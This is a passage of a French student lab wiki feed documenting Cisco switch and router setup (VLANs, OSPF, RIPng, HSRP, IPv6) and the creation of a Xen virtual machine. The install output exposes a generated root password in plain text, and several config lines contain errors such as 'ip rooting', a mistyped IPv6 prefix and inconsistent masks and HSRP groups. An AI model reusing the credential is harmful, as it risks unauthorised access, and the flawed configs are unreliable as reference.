|style=&amp;quot;width: 40%&amp;quot;| Ge 1/1(E306) &amp;amp; Ge 2/2(E304) &lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour le router =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour l'autre commutateur =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création des Vlan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 42&lt;br /&gt;
    name Corduan&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 3 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 3 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexio&lt;br /&gt;
   &lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51431</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51431"/>
				<updated>2019-11-29T13:08:27Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Informations importantes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 - CW&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
